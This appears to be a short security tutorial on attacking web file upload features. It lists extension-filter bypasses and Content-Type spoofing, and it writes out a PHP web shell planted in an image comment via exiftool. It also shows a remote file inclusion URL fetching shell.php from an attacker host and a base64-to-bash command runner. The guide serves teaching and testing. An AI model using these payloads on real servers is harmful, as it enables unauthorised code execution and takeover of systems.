Intro

File upload has been a popular attack vector for many web based applications that supports it. In this case study, we are going to look at several popular attack vectors in the area of file upload and how they are usually be exploited.

Bypass client side filters

This scenario is very straightforward, simply bypass it by invoking the backend endpoint directly. This is why performing input validation on both client and server is necessary.

Bypass extension checks

This can come in two forms: allow listing and deny listing.

For allow listing, consider bypass using:

  • Null byte: e.g evil.php%00.jpg (reading terminates at %00)
  • Double extension: e.g evil.php.jpg (reading terminates at the first extension detected)
  • Invalid extension: e.g evil.php.invalid (reading terminates at .php because .invalid is not recognized)

For deny listing, consider bypass using:

  • Case sensitive extension, eg: evil.PhP
  • Bypass regex, you may try this online tool for testing purpose: https://www.regextester.com/
  • Try alternative extensions, eg: instead of .php, try .phar

Content-type

Content-type is a header used to indicate to the server what type of content should be expected, this is something that can be changed before reaching the server.

The server may be expecting an image without checking the file, we may force the server to interpret the content in a different way

Content-Disposition: form-data; name="image"; filename="evil.php"
Content-Type: image/gif

Some servers can be tricked by incuding the GIF89a; image header

GIF89a;
<?php phpinfo(); ?>

Can also try injecting the payload into the comment section of an image

> exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' evil.jpg

Using FI

Sometimes a server may expose a file inclusion vulnerability, where we can make it load a script in our control

http://target.com/?path=http://<attacker>/shell.php

Command injection for image upload

Sometimes a server may perform some processing to an uploaded image file and it would sometimes inevitably require access to tools on the filesystem such as exiftool, imagemagic. There are well known public exploits available to these tools.

If a payload doesn’t work due to special characters, base64 encoding the payload can always be helpful.

> echo <base64-payload> | base64 -d | bash